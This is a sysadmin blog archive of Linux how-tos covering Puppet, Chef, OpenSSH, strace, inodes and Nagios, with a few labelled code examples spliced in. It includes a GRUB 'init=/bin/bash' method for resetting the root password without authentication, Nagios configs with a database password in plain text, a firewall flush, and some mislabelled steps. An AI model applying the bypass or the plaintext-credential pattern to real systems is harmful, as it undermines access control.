Saturday, 19 September 2015

Install and Configure Puppet on Ubuntu 14.04

apt-get install openssl

Configure DNS for the master and the agent:
dev.puppetmaster.com
dev.puppetagent.com

On 192.168.190.133 (master):
apt-get install puppetmaster

On 192.168.190.134 (agent):
apt-get install puppet

On the agent, point it at the master in /etc/puppet/puppet.conf:
nano /etc/puppet/puppet.conf
server=dev.puppetmaster.com

puppet agent --no-daemonize --onetime --verbose
Info: Creating a new SSL key for dev.puppetagent.com
Info: Caching certificate for ca
Info: csr_attributes file loading from /etc/puppet/csr_attributes.yaml
Info: Creating a new SSL certificate request for dev.puppetagent.com
Info: Certificate Request fingerprint (SHA256): ED:AD:10:24:4D:F0:FF:C1:11:D5:E1:94:AD:C7:01:3C:1B:E4:E0:E3:0F:14:16:ED:5A:F7:A1:E0:AE:76:07:51
Info: Caching certificate for ca
Exiting; no certificate found and waitforcert is disabled

puppet cert list
  "dev.puppetagent.com" (SHA256) ED:AD:10:24:4D:F0:FF:C1:11:D5:E1:94:AD:C7:01:3C:1B:E4:E0:E3:0F:14:16:ED:5A:F7:A1:E0:AE:76:07:51

puppet cert sign "dev.puppetagent.com"
Notice: Signed certificate request for dev.puppetagent.com
Notice: Removing file Puppet::SSL::CertificateRequest dev.puppetagent.com at '/var/lib/puppet/ssl/ca/requests/dev.puppetagent.com.pem'

puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442726550'
Info: Creating state file /var/lib/puppet/state/state.yaml
Notice: Finished catalog run in 0.02 seconds

Example Puppet configuration (on the master):

cd /etc/puppet/manifests/
nano site.pp

class toolbox {
  # Deploys a small wrapper that runs a one-off agent run; any extra
  # argument given to the wrapper is passed through to puppet agent.
  file { '/usr/local/sbin/puppetsimple.sh':
    owner   => 'root',
    group   => 'root',
    mode    => '0755',
    # \$1 keeps a literal $1 in the shell script; an unescaped $1 inside a
    # double-quoted Puppet string is interpolated as an (empty) variable.
    content => "#!/bin/sh\npuppet agent --onetime --no-daemonize --verbose \$1\n",
  }
}

node 'dev.puppetagent.com' {
  include toolbox
}


puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442727359'
Notice: /Stage[main]/Toolbox/File[/usr/local/sbin/puppetsimple.sh]/ensure: defined content as '{md5}db35206364e274612ff0caee2ce0f9d0'
Notice: Finished catalog run in 0.05 seconds

puppetsimple.sh
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442728015'
Notice: Finished catalog run in 0.03 seconds

chmod 0123 /usr/local/sbin/puppetsimple.sh

puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442728015'
Notice: /Stage[main]/Toolbox/File[/usr/local/sbin/puppetsimple.sh]/mode: mode changed '0123' to '0755'
Notice: Finished catalog run in 0.03 seconds

Ref :- https://www.youtube.com/watch?v=Hiu_ui2nZa0

Change Hostname in Ubuntu

Manually Edit the hostname

sudo nano /etc/hosts
sudo nano /etc/hostname
sudo reboot

Use sed to change the hostname

sudo sed -i 's/ubuntu/new-hostname/g' /etc/hosts
sudo sed -i 's/ubuntu/new-hostname/g' /etc/hostname
sudo reboot

Write a Bash Script

#!/bin/bash
# Assign the existing hostname to $hostn
hostn=$(cat /etc/hostname)

# Display the existing hostname
echo "Existing hostname is $hostn"

# Ask for the new hostname and store it in $newhost
echo "Enter new hostname: "
read -r newhost

# Refuse an empty name: sed would otherwise delete the hostname entirely
if [ -z "$newhost" ]; then
    echo "No hostname given, nothing changed"
    exit 1
fi

# Change the hostname in /etc/hosts and /etc/hostname
sudo sed -i "s/$hostn/$newhost/g" /etc/hosts
sudo sed -i "s/$hostn/$newhost/g" /etc/hostname

# Display the new hostname
echo "Your new hostname is $newhost"

# Press a key to reboot
read -s -n 1 -p "Press any key to reboot"
sudo reboot

Ref:- https://pricklytech.wordpress.com/2013/04/24/ubuntu-change-hostname-permanently-using-the-command-line/

Friday, 18 September 2015

Regenerate SSL Certs on Puppet Master

SSL: Regenerating All Certificates in a Puppet Deployment

Back up the ssl dir:
/var/lib/puppet/ssl

Stop the Puppet agent service
/etc/init.d/puppetmaster stop

Stop the Puppet master service
/etc/init.d/apache2 stop

Locate Puppet’s ssldir
puppet config print ssldir

Delete all files in the ssldir
rm -r /var/lib/puppet/ssl

Regenerate the CA by running:
puppet cert list -a

Generate the Puppet master’s new certs
puppet master --no-daemonize --verbose

When you see Notice: Starting Puppet master <your Puppet version>,
type CTRL + C

Start the Puppet master service
/etc/init.d/puppetmaster start

Start the Puppet agent service
/etc/init.d/apache2 start

Ref : -
http://docs.puppetlabs.com/puppet/3.7/reference/ssl_regenerate_certificates.html

OpenSSH Server in Ubuntu


OpenSSH is a freely available version of the Secure Shell (SSH) protocol family of tools for remotely controlling, or transferring files between, computers.

apt-get install openssh-server

sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.original
sudo chmod a-w /etc/ssh/sshd_config.original

The following are examples of configuration directives you may change:

To set your OpenSSH to listen on TCP port 2222 instead of the default TCP port 22, change the Port directive as such:

Port 2222

To have sshd allow public key-based login credentials, simply add or modify the line:

PubkeyAuthentication yes

If the line is already present, then ensure it is not commented out.

To make your OpenSSH server display the contents of the /etc/issue.net file as a pre-login banner, simply add or modify the following line in the /etc/ssh/sshd_config file:

Banner /etc/issue.net

Then restart the service:

sudo service ssh restart

Ref:- https://help.ubuntu.com/lts/serverguide/openssh-server.html


Thursday, 17 September 2015

Ubuntu 14.04 Root Password Recovery

First, reboot or reset your system to the GRUB2 boot loader menu.

Find the line which starts with "linux". Navigate to the end of the line and add:
init=/bin/bash

Once you have changed the boot options as indicated in the previous step, press F10 to instruct your Ubuntu system to boot.

Your system will boot and you will be provided with a root command line prompt.

Once you get to the command line prompt enter the following commands:
mount -o remount,rw /
passwd
reboot -f

Ref :- http://linuxconfig.org/ubuntu-14-04-lost-password-recovery


Monday, 7 September 2015

Chef Installation and configure on CentOS



Install chef-server
iptables -F
rpm -ivh chef-server-11.1.7-1.el6.x86_64.rpm

Configure Chef Server

chef-server-ctl reconfigure

Running handlers:
Running handlers complete
Chef Client finished, 415/479 resources updated in 220.548599949 seconds
Chef Server Reconfigured!

Confirm the Chef server is running:

chef-server-ctl status
run: bookshelf: (pid 1084) 60730s; run: log: (pid 1083) 60730s
run: chef-expander: (pid 1080) 60730s; run: log: (pid 1079) 60730s
run: chef-server-webui: (pid 1070) 60730s; run: log: (pid 1068) 60730s
run: chef-solr: (pid 1076) 60730s; run: log: (pid 1073) 60730s
run: erchef: (pid 1085) 60730s; run: log: (pid 1082) 60730s
down: nginx: 0s, normally up, want up; run: log: (pid 1078) 60730s
run: postgresql: (pid 1091) 60730s; run: log: (pid 1072) 60730s
run: rabbitmq: (pid 1075) 60730s; run: log: (pid 1071) 60730s


Optionally, run the Opscode Pedant test suite. This will verify that everything is working.
chef-server-ctl test

Configure Chef Workstation

Check whether the Chef client package is already installed:

rpmquery chef
package chef is not installed

rpm -ivh chef-11.18.12-1.el6.x86_64.rpm

rpmquery chef
chef-11.18.12-1.el6.x86_64

chef-client

To secure communication with the Chef server,

copy the following files from /etc/chef-server on the Chef server to the Chef workstation:
scp -r admin.pem chef-validator.pem chef-webui.pem root@10.98.33.204:/root/.chef
admin.pem
chef-validator.pem
chef-webui.pem

Create a .chef directory in the home directory (mkdir ~/.chef) and move all three files into it.

knife configure -i
Overwrite /root/.chef/knife.rb? (Y/N)Y
Please enter the chef server URL: [https://testchefwork.example.com:443] https://testchefserver.example.com:443
Please enter a name for the new user: [root]
Please enter the existing admin name: [admin] admin
Please enter the location of the existing admin's private key: [/etc/chef-server/admin.pem] /root/.chef/admin.pem
Please enter the validation clientname: [chef-validator]
Please enter the location of the validation key: [/etc/chef-server/chef-validator.pem] /root/.chef/chef-validator.pem
Please enter the path to a chef repository (or leave blank):
Creating initial API user...
Please enter a password for the new user:
Created user[root]
Configuration file written to /root/.chef/knife.rb

knife ssl fetch

knife ssl check

Connecting to host testchefserver.example.com:443
ERROR: The SSL certificate of testchefserver.example.com could not be verified
Certificate issuer data: /C=US/ST=WA/L=Seattle/O=YouCorp/OU=Operations/CN=testchefserver.example.com/emailAddress=you@example.com

Configuration Info:

OpenSSL Configuration:
* Version: OpenSSL 1.0.1m 19 Mar 2015
* Certificate file: /opt/chef/embedded/ssl/cert.pem
* Certificate directory: /opt/chef/embedded/ssl/certs
Chef SSL Configuration:
* ssl_ca_path: nil
* ssl_ca_file: nil
* trusted_certs_dir: "/root/.chef/trusted_certs"

TO FIX THIS ERROR:

If the server you are connecting to uses a self-signed certificate, you must
configure chef to trust that server's certificate.

By default, the certificate is stored in the following location on the host
where your chef-server runs:

  /var/opt/chef-server/nginx/ca/SERVER_HOSTNAME.crt

Copy that file to you trusted_certs_dir (currently: /root/.chef/trusted_certs)
using SSH/SCP or some other secure method, then re-run this command to confirm
that the server's certificate is now trusted.

knife ssl check
Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'

knife client list

chef-validator
chef-webui
knife user list
admin
jojan
root

Node configuration

iptables -L

rpm -ivh chef-11.18.12-1.el6.x86_64.rpm

warning: chef-11.18.12-1.el6.x86_64.rpm: Header V4 DSA/SHA1 Signature, key ID 83ef826a: NOKEY
Preparing...                ########################################### [100%]
   1:chef                   ########################################### [100%]
Thank you for installing Chef!

Copy chef-validator.pem from /etc/chef-server on the Chef server to /etc/chef on the node.

knife ssl fetch -s https://testchefserver.example.com

WARNING: No knife configuration file found
WARNING: Certificates from testchefserver.example.com will be fetched and placed in your trusted_cert
directory ().

Knife has no means to verify these are the correct certificates. You should
verify the authenticity of these certificates after downloading.

ERROR: TypeError: can't convert nil into String

 knife ssl check
Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'
[root@testchefnode .chef]# knife ssl fetch -s https://testchefserver.example.com
WARNING: Certificates from testchefserver.example.com will be fetched and placed in your trusted_cert
directory (/root/.chef/trusted_certs).

Knife has no means to verify these are the correct certificates. You should
verify the authenticity of these certificates after downloading.

Adding certificate for testchefserver.example.com in /root/.chef/trusted_certs/testchefserver_example_com.crt

knife ssl check -s https://testchefserver.example.com

Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'
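Both knife ssl fetch runs above warn that knife has no way to verify that the fetched certificate is the correct one; the earlier knife ssl check error names the server-side copy (/var/opt/chef-server/nginx/ca/SERVER_HOSTNAME.crt) to compare against. As an added example (not from the original post or from Chef), the POSIX shell functions below compare the SHA-256 fingerprint of the certificate knife stored in trusted_certs with a copy of the server's certificate obtained out of band; the function names are assumed, the test certificates are generated locally so the script runs offline, and the openssl CLI is required.

```shell
#!/bin/sh
# Added example, not part of the original post or of Chef itself.
# Compares the SHA-256 fingerprint of a certificate that knife placed in
# trusted_certs with a reference copy obtained out of band (for example an
# scp of /var/opt/chef-server/nginx/ca/SERVER_HOSTNAME.crt). Needs openssl.

# SHA-256 fingerprint of a PEM certificate, hex colon form only.
cert_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 | sed 's/^.*=//'
}

# Prints "match" when both files carry the same certificate, "MISMATCH" otherwise.
# Exit status: 0 on match, 1 on mismatch, 2 if either file is unreadable.
verify_trusted_cert() {
    fetched="$1"    # e.g. /root/.chef/trusted_certs/testchefserver_example_com.crt
    reference="$2"  # the copy taken from the server over SSH/SCP
    [ -r "$fetched" ] && [ -r "$reference" ] || { echo "unreadable input"; return 2; }
    f1=$(cert_fingerprint "$fetched")
    f2=$(cert_fingerprint "$reference")
    if [ -n "$f1" ] && [ "$f1" = "$f2" ]; then
        echo "match $f1"
        return 0
    fi
    echo "MISMATCH fetched=$f1 reference=$f2"
    return 1
}

# Generates a throw-away self-signed certificate (constructed test data) so the
# check can be exercised offline; the CN is a placeholder, not a real host.
make_test_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
        -subj "/CN=$2" -keyout "$1.key" -out "$1" >/dev/null 2>&1
}

# Demo: the genuine copy matches, a different certificate does not.
# Prints the two exit statuses, "0 1".
demo_verify() {
    dir=$(mktemp -d)
    make_test_cert "$dir/server.crt" "testchefserver.example.com"
    cp "$dir/server.crt" "$dir/fetched.crt"             # what knife ssl fetch stores
    make_test_cert "$dir/other.crt" "impostor.example"   # constructed: a different cert
    if verify_trusted_cert "$dir/fetched.crt" "$dir/server.crt" >/dev/null; then good=0; else good=$?; fi
    if verify_trusted_cert "$dir/fetched.crt" "$dir/other.crt" >/dev/null; then bad=0; else bad=$?; fi
    rm -rf "$dir"
    echo "$good $bad"
}
```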

cat /etc/chef/client.rb
log_level :info
log_location STDOUT
chef_server_url "https://testchefserver.example.com:443"
trusted_certs_dir "/root/.chef/trusted_certs"

chef-client -S https://testchefserver.example.com -K /etc/chef/chef-validator.pem

Creating a recipe on the workstation and uploading it to the server

knife cookbook create motd
** Creating cookbook motd
** Creating README for cookbook: motd
** Creating CHANGELOG for cookbook: motd
** Creating metadata for cookbook: motd

cd /var/chef/cookbooks/motd

ls -l
attributes
CHANGELOG.md
definitions
files
libraries
metadata.rb
providers
README.md
recipes
resources
templates

cd recipes/
vi default.rb

file '/etc/motd' do
  content 'Welcome to chef'
end

Before uploading to the server, make sure there are no syntax errors:

knife cookbook test motd
checking motd
Running syntax check on motd
Validating ruby files
Validating templates
Validating ruby files
Validating templates

Upload to the server:

knife cookbook upload motd
Uploading motd         [0.1.0]
Uploaded 1 cookbook.

To check from the server:

knife cookbook list
motd   0.1.0

To check from the dashboard:
https://testchefserver.example.com/cookbooks

Add the cookbook to a node:

Go to https://testchefserver.example.com/nodes, edit the node, and drag the motd recipe from Available Recipes to the Run List.

chef-client
[2015-09-07T11:17:30+05:30] INFO: Forking chef instance to converge...
[2015-09-07T11:17:30+05:30] WARN:
........................................
- update content in file /etc/motd from e3b0c4 to cad802
    --- /etc/motd       2010-01-12 18:58:22.000000000 +0530
    +++ /tmp/.motd20150907-26207-mb0jjs 2015-09-07 11:17:32.622947241 +0530
    @@ -1 +1,2 @@
    +Welcome to chef
    - restore selinux security context
[2015-09-07T11:17:32+05:30] INFO: Chef Run complete in 0.661581977 seconds

Running handlers:
[2015-09-07T11:17:32+05:30] INFO: Running report handlers
Running handlers complete
[2015-09-07T11:17:32+05:30] INFO: Report handlers complete
Chef Client finished, 1/1 resources updated in 2.350334219 seconds

Now check the file on the node server:

cat /etc/motd
Welcome to chef

Ref:- https://www.youtube.com/watch?v=egvEPsVMfK0

Wednesday, 2 September 2015

Disable FirewallD and use iptables in RHEL 7 and CentOS 7


If you want to use iptables on CentOS 7 and RHEL 7 instead of FirewallD, follow these steps:

systemctl mask firewalld

systemctl stop firewalld

yum -y install iptables-services

systemctl enable iptables

Ref: http://www.tejasbarot.com/2014/08/02/rhel-7-centos-7-disable-firewalld-and-use-iptables/#axzz3keP3fIkw


FirewallD


FirewallD provides a dynamically managed firewall with support for network/firewall zones to define the trust level of network connections or interfaces. It has support for IPv4, IPv6 firewall settings and for ethernet bridges and has a separation of runtime and permanent configuration options. It also supports an interface for services or applications to add firewall rules directly.

Features
D-Bus API
Timed firewall rules
Rich Language for specific firewall rules
IPv4 and IPv6 NAT support
Lockdown: Whitelisting of applications that may modify the firewall
Support for iptables, ip6tables, ebtables firewall backends
Automatic loading of Linux kernel modules
Integration with Puppet

Who’s using it?
FirewallD is used in the following Linux distributions as the default firewall management tool:

RHEL 7
Fedora 18 and newer

Applications and libraries which support FirewallD as a firewall management tool include:

NetworkManager
libvirt
docker 1.7

Ref: http://www.firewalld.org/

Monday, 27 July 2015

Testing SMTP Server from the windows command line


C:\Users\Administrator>telnet relay.mx.testserver.com 25

220 mb1relay1.mx.testserver.com ESMTP
helo test
250 mb1relay1.mx.testserver.com
mail from: usename1@mail.com
250 sender <usename1@mail.com> ok
rcpt to: usename2@mail.com
250 recipient <usename2@mail.com> ok
data
354 go ahead
Hi How are you
.
250 ok:  Message 258249 accepted
quit
221 mb1relay1.mx.testserver.com


Connection to host lost.

Ref :- https://www.youtube.com/watch?v=lfYtz3uRPYc


Sunday, 26 July 2015

Nullifying a log file


Clear a file using /dev/null 

/dev/null is often referred to as a black hole on Linux-based systems. It discards all data written to it and returns EOF (end of file) to any process reading from it. Using this behaviour, we can clear the contents of a file.

cp /dev/null logfile

cat /dev/null > logfile

> logfile

dd if=/dev/null of=logfile

Clear a file using truncate

truncate logfile --size 0
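All of the commands above truncate the file in place rather than deleting it, which is what keeps a running daemon's open file descriptor pointing at the same inode. As an added example (not from the original post), the POSIX shell functions below show what a writer sees after the post's "> logfile": one that opened the log with O_APPEND, as most loggers do, and one that did not, plus a check that the inode survives the truncation. Function names and the sample log lines are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original post: why in-place truncation is
# safe for an O_APPEND writer and what a writer without O_APPEND sees instead.

# Size of a file in bytes (whitespace stripped for portability of wc output).
file_size() {
    wc -c < "$1" | tr -d ' '
}

# Inode number of a file, via POSIX ls -i.
file_inode() {
    ls -i "$1" | awk '{print $1}'
}

# Truncate while an O_APPEND writer holds the file open.
# Prints the final size: only the post-truncate line (15 bytes) survives.
truncate_with_append_writer() {
    dir=$(mktemp -d)
    log="$dir/app.log"
    exec 3>>"$log"                       # writer opens with O_APPEND
    printf 'constructed log line 1\n' >&3
    printf 'constructed log line 2\n' >&3   # 46 bytes written so far
    : > "$log"                           # the post's "> logfile"
    printf 'after truncate\n' >&3        # O_APPEND: lands at the new EOF, offset 0
    exec 3>&-
    size=$(file_size "$log")
    rm -rf "$dir"
    echo "$size"
}

# Same, but the writer opened without O_APPEND: its own file offset is not
# reset by the truncation, so the next write lands at the old offset (46) and
# the kernel zero-fills the gap. Prints 61: 46 NUL bytes plus the 15-byte line.
truncate_with_plain_writer() {
    dir=$(mktemp -d)
    log="$dir/app.log"
    exec 3>"$log"                        # writer opens without O_APPEND
    printf 'constructed log line 1\n' >&3
    printf 'constructed log line 2\n' >&3
    : > "$log"
    printf 'after truncate\n' >&3        # written at offset 46, hole before it
    exec 3>&-
    size=$(file_size "$log")
    rm -rf "$dir"
    echo "$size"
}

# Truncation keeps the inode, so open descriptors stay valid; rm would not.
# Prints "yes" when the inode number is unchanged.
inode_preserved_by_truncate() {
    dir=$(mktemp -d)
    log="$dir/app.log"
    printf 'constructed log line 1\n' > "$log"
    before=$(file_inode "$log")
    : > "$log"
    after=$(file_inode "$log")
    rm -rf "$dir"
    if [ "$before" = "$after" ]; then echo yes; else echo no; fi
}
```

The plain-writer case is why a log that was "emptied" can show a large size full of NUL bytes afterwards; rotating such a log needs the daemon to reopen it.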


Wednesday, 20 May 2015

strace

strace is a useful diagnostic, instructional, and debugging tool.

Strace monitors the system calls and signals of a specific program. It is helpful when you do not have the source code and would like to debug the execution of a program. strace provides you the execution sequence of a binary from start to end.

strace shows you how data is passed between the program and the kernel. With no options, strace prints a line for each system call. It shows the call name, given arguments, return value, and any generated error messages. A signal is printed with both its signal symbol and a descriptive string. As it shows the data transfer between user and kernel-space, strace is very useful as both a diagnostic utility for system administrators and a debugging tool for programmers. By default, the output is written to standard error.

Trace the Execution of an Executable
strace ls

Trace Specific System Calls in an Executable Using Option -e
strace -e open ls

Save the Trace Execution to a File Using Option -o
strace -o output.txt ls

Execute Strace on a Running Linux Process Using Option -p
ps -C firefox-bin

Print Timestamp for Each Trace Output Line Using Option -t
strace -t -e open ls /home

Print Relative Time for System Calls Using Option -r
strace -r ls

Generate Statistics Report of System Calls Using Option -c
strace -c ls /home

eg :-
strace -p 3107
strace -d -p 3107

To print instruction pointer at the time of system call
strace -i -p 3111

To print time stamps of the system call
strace -t -p 3111

Options

-a n
Align the return values in column n. The default is 40.

-c
Count system calls, errors, signals, and time and provide a summary report when the program has ended.

-d
Debug mode. Print debugging information for strace on stderr.

-e [keyword=] [!] values
Pass an expression to strace to limit the types of calls or signals that are traced or to change how they are displayed. If no keyword is given, trace is assumed. The values can be given as a comma-separated list. Preceding the list with an exclamation point (!) negates the list. The special values all and none are valid, as are the values listed with the following keywords.

abbrev=names
Abbreviate output from large structures for system calls listed in names.

read=descriptors
Print all data read from the given file descriptors.

signal=symbols
Trace the listed signal symbols (for example, signal=SIGIO,SIGHUP).

trace=sets
sets may be a list of system call names or one of the following:

file
Calls that take a filename as an argument.

ipc
Interprocess communication.

network
Network-related.

process
Process management.

signal
Signal-related.

raw=names
Print arguments for the given system calls in hexadecimal.

verbose=names
Unabbreviate structures for the given system calls. Default is none.

write=descriptors
Print all data written to the given file descriptors.

-f
Trace forked processes.

-ff
Write system calls for forked processes to separate files named filename.pid when using the -o option.

-h
Print help and exit.

-i
Print the current instruction pointer with each system call.

-o filename
Write output to filename instead of stderr. If filename starts with the pipe symbol |, treat the rest of the name as a command to which output should be piped.

-O n
Override strace's built-in timing estimates, and just subtract n microseconds from the timing of each system call to adjust for the time it takes to measure the call.

-p pid
Attach to the given process ID and begin tracking. strace can track more than one process if more than one option -p is given.

Type Ctrl-C to end the trace.

-q
Quiet mode. Suppress attach and detach messages from strace.

-r
Relative timestamp. Print time in microseconds between system calls.

-s n
Print only the first n characters of a string. Default value is 32.

-S value
Sort output of -c option by the given value. value may be calls, name, time, or nothing. Default is time.

-T
Print time spent in each system call.

-t
Print time of day on each line of output.

-tt
Print time of day with microseconds on each line of output.

-ttt
Print timestamp on each line as the number of seconds and microseconds since the Epoch.

-u username
Run command as username. Needed when tracing setuid and setgid programs.

-V
Print version and exit.

-v
Verbose. Do not abbreviate structure information.

-x
Print all non-ASCII strings in hexadecimal.

-xx
Print all strings in hexadecimal.

Ref:-
http://www.thegeekstuff.com/2011/11/strace-examples/
http://www.linuxdevcenter.com/cmd/cmd.csp?path=s/strace
http://chadfowler.com/blog/2014/01/26/the-magic-of-strace/

Fields of an inode

Inode is a data structure used to represent a filesystem object, which can be one of various things including a file or a directory. Each inode stores the attributes and disk block location(s) of the filesystem object's data. Filesystem object attributes may include manipulation metadata (e.g. change, access, modify time), as well as owner and permission data (e.g. group-id, user-id, permissions).

ls -il
total 52
185033 -rw-------. 1 root root   979 Apr 25 23:23 anaconda-ks.cfg
393286 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Desktop
393290 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Documents
393287 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Downloads
393291 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Music
393292 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Pictures
185050 -rw-r--r--. 1 root root 11955 Apr 23  2013 post-install
185053 -rw-r--r--. 1 root root   552 Apr 23  2013 post-install.log
393289 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Public
393288 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Templates
393293 drwxr-xr-x. 2 root root  4096 Apr 29 09:09 Videos

File attributes stored in the inode include:

The size of the file in kilobytes
Device ID
User ID of the file's owner
Group ID of the file
The file mode, which determines the file type and how the owner, group, and others (world) can access the file
Additional system and user flags to further protect the file (note: these can be used to limit the file's use and modification)
Timestamps telling when the inode itself was last changed (ctime, change time), when the file content was last modified (mtime, modification time), and when the file was last accessed (atime, access time)
A link counter that lists how many hard links point to the inode
Pointers to the disk blocks that store the file's contents (more on that later)
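The link counter and the inode number from the list above can be watched directly with the ls -il output shown earlier. As an added example (not from the original post), the POSIX shell functions below create a hard link to a constructed file, confirm both names share one inode, and show the link counter rising and falling; the data only disappears when the last link goes, which matters when a file is "deleted" but still linked elsewhere. Function names are assumed.

```shell
#!/bin/sh
# Added example, not part of the original post: inode number and hard-link
# counter of a constructed file, read from POSIX ls output.

# Inode number (first field of 'ls -i').
inode_of() {
    ls -i "$1" | awk '{print $1}'
}

# Hard-link count (second field of 'ls -l').
link_count() {
    ls -l "$1" | awk '{print $2}'
}

# Demo: create a file, add a hard link, remove the original name, show the
# data survives under the other name.
# Prints: "<same inode yes/no> <links before> <links after ln> <links after rm> <content>"
demo_hard_links() {
    dir=$(mktemp -d)
    printf 'constructed content\n' > "$dir/a"
    n0=$(link_count "$dir/a")            # 1: one name points at the inode
    ln "$dir/a" "$dir/b"                 # second name for the same inode
    same=no
    if [ "$(inode_of "$dir/a")" = "$(inode_of "$dir/b")" ]; then same=yes; fi
    n1=$(link_count "$dir/a")            # 2
    rm "$dir/a"                          # drops one name; inode stays while links > 0
    n2=$(link_count "$dir/b")            # 1
    content=$(cat "$dir/b")              # still readable through the remaining link
    rm -rf "$dir"
    echo "$same $n0 $n1 $n2 $content"
}
```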

Ref:-
http://en.wikipedia.org/wiki/Inode
http://www.linux-mag.com/id/8658/
http://teaching.idallen.com/dat2330/04f/notes/links_and_inodes.html

Tuesday, 7 April 2015

Nagios Client configuration


Windows
------------
http://nsclient.org/nscp/downloads
Install the NSCP agent and give it the Nagios server's IP address.

On the Nagios server,

vi /usr/local/nagios/etc/objects/myclientserver.cfg
vi /usr/local/nagios/etc/nagios.cfg

Add an entry for myclientserver.cfg to nagios.cfg, then validate the configuration and restart:
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
/etc/init.d/nagios restart

Linux
------------
Download the required packages, for example:
nrpe-2.14.tar.gz
nagios-plugins-2.0.tar.gz

tar -xzvf nagios-plugins-2.0.tar.gz
tar -xzvf nrpe-2.14.tar.gz

yum install gcc
yum install openssl*
ldconfig

cd nagios-plugins-2.0
./configure
make
make install
useradd nagios
chown -R nagios:nagios /usr/local/nagios

cd ../nrpe-2.14
./configure
make all
make install-plugin
make install-daemon
yum install xinetd
make install-daemon-config
make install-xinetd

vi /etc/xinetd.d/nrpe
only_from       = 127.0.0.1 10.11.22.22

vi /etc/services
nrpe            5666/tcp                # nrpe

/etc/init.d/xinetd restart
netstat -an | grep -i 5666

yum install telnet
telnet 10.11.22.22 5666

ifconfig
yum install sysstat

cd /usr/local/nagios/
mv /home/agoviku/libexec.tar.gz .
mv /home/agoviku/md5s .
chown -R nagios.nagios /usr/local/nagios
tar -xzvf libexec.tar.gz

scp -r /usr/local/nagios/libexec usename@10.11.11.59:/tmp

cp -r /tmp/libexec /usr/local/nagios/
chown -R nagios:nagios /usr/local/nagios/
chmod -R 755 /usr/local/nagios/libexec

For Web servers,
vi /usr/local/nagios/etc/nrpe.cfg
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_disk1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_disk2]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /data
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 400 -c 450
command[check_sendmail]=/usr/local/nagios/libexec/check_tcp -H localhost -p 25
command[check_cpu]=/usr/local/nagios/libexec/check_cpu.sh -w 60 -c 90
command[check_rofs1]=/usr/local/nagios/libexec/check_rofs.sh /
command[check_rofs2]=/usr/local/nagios/libexec/check_rofs.sh /data
command[check_md5]=/usr/local/nagios/libexec/check_md5.sh /etc/httpd/conf.d/vhost.conf
command[check_crond]=/usr/local/nagios/libexec/check_procs -c 1:20 -C crond
command[check_apache]=/usr/local/nagios/libexec/check_apache.sh -w 100 -c 200
command[check_apache2]=/usr/local/nagios/libexec/check_apache2.sh -w 100 -c 200

For DB servers,
vi /usr/local/nagios/etc/nrpe.cfg
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_disk]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /data
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 250 -c 300
command[check_cpu]=/usr/local/nagios/libexec/check_cpu.sh -w 60 -c 90
command[check_md5]=/usr/local/nagios/libexec/check_md5.sh /etc/my.cnf
command[check_mysql]=/usr/local/nagios/libexec/check_mysql -u nagiosusr -p 'passwrod' -s /data/var/lib/mysql/mysql.sock
command[check_mysql2]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-connected   mysql2
command[check_mysql3]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  threadcache-hitrate  mysql3
command[check_mysql4]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-created  mysql4
command[check_mysql5]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-running mysql5
command[check_mysql6]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-cached  mysql6
command[check_mysql7]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode connects-aborted  mysql7
command[check_mysql8]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode clients-aborted  mysql8
command[check_mysql9]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  qcache-hitrate --lookback 1800 --warning 50 --critical 20  mysql9
command[check_mysql10]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  qcache-lowmem-prunes mysql10
command[check_mysql11]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  keycache-hitrate --warning 50: --critical 20:  mysql11
